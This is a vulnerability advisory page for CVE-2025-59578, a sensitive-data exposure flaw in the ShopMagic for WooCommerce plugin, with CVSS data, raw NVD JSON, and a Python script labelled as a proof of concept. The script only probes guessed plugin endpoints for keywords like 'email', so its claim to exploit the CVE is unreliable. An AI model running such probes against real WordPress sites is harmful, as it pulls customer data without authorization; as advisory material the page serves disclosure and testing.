Security Vulnerability Report
中文
CVE-2025-59578 CVSS 5.8 MEDIUM

CVE-2025-59578

Published: 2025-10-22 15:15:56
Last Modified: 2026-04-15 00:35:42

Description

Insertion of Sensitive Information Into Sent Data vulnerability in wpdesk ShopMagic shopmagic-for-woocommerce allows Retrieve Embedded Sensitive Data.This issue affects ShopMagic: from n/a through <= 4.5.6.

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ShopMagic for WooCommerce <= 4.5.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-59578 PoC - ShopMagic Sensitive Data Exposure # Target: WordPress site with ShopMagic plugin <= 4.5.6 target_url = "http://target-wordpress-site.com" # Common endpoints that might expose sensitive data endpoints = [ "/wp-json/shopmagic/v1/", "/wp-admin/admin-ajax.php", "/?rest_route=/shopmagic/v1/" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/json" } print("[*] CVE-2025-59578 Sensitive Data Exposure PoC") print("[*] Target:", target_url) for endpoint in endpoints: url = target_url + endpoint print(f"\n[*] Testing endpoint: {endpoint}") try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: data = response.text # Check for sensitive data patterns sensitive_patterns = ['email', 'phone', 'address', 'name', 'ip_address'] for pattern in sensitive_patterns: if pattern.lower() in data.lower(): print(f"[!] Potential sensitive data found: {pattern}") print(f"[*] Response snippet: {data[:500]}") break except Exception as e: print(f"[-] Error: {e}") print("\n[*] Note: Manual verification required as exact endpoint may vary")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59578", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:56.040", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in wpdesk ShopMagic shopmagic-for-woocommerce allows Retrieve Embedded Sensitive Data.This issue affects ShopMagic: from n/a through <= 4.5.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/shopmagic-for-woocommerce/vulnerability/wordpress-shopmagic-plugin-4-5-6-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}